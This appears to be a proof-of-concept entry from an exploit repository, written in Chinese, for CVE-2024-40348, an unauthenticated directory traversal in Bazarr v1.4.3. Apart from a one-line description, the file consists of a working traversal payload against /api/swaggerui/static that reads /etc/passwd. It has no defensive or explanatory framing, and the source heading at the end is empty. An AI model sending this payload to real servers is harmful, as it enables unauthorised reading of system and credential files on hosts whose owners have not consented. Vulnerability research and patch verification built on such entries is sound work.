POC00/Bazarr任意文件读取(CVE-2024-40348).md
2024-07-24 21:44:16 +08:00

428 B

Bazarr任意文件读取(CVE-2024-40348)

Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。

poc

/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd

漏洞来源